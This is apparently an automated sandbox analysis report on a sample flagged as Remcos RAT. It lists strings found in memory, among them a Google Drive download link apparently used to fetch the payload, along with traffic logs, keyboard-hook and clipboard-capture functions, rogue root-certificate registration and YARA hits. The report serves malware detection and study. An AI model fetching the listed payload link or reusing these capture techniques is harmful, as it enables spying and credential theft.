                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: xkn.exe, 00000009.00000002.2186571233.0000015A4AE96000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/user
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Kpeyvroh.PIFString found in binary or memory: http://geoplugin.net/json.gp
                    Source: sppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2BF
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpK0r
                    Source: sppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpa
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpoft
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpthority
                    Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: Kpeyvroh.PIF, Kpeyvroh.PIF, 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                    Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
                    Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: sppsvc.pif, 0000001C.00000002.4519735851.000000001A71D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
                    Source: sppsvc.pif, 0000001C.00000002.4519735851.000000001A700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4502894836.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/6
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000796000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download
                    Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=downlo
                    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
                    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
                    Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
                    Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
                    Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
                    Source: SystemSettingsAdminFlows.exe, 00000013.00000002.4501063823.000001C6008E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
                    Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownHTTPS traffic detected: 23.35.153.42:443 -> 192.168.2.5:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.217.193:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FA2B8 SetWindowsHookExA 0000000D,1B9FA2A4,0000000028_2_1B9FA2B8
                    Installs a global keyboard hook
                    Source: C:\Users\Public\Libraries\sppsvc.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\sppsvc.pif
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FB70E OpenClipboard,GetClipboardData,CloseClipboard,28_2_1B9FB70E
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210768C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,36_2_210768C1
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FB70E OpenClipboard,GetClipboardData,CloseClipboard,28_2_1B9FB70E
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9FA3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,28_2_1B9FA3E0
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Registers a new ROOT certificate
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE60BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,25_2_00007FF67DEE60BC

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0C9E2 SystemParametersInfoW,28_2_1BA0C9E2
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_2107C9E2 SystemParametersInfoW,36_2_2107C9E2
                    Reads the Security eventlog
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Reads the System eventlog
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\Public\xkn.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,25_2_00007FF67DE5F9B8
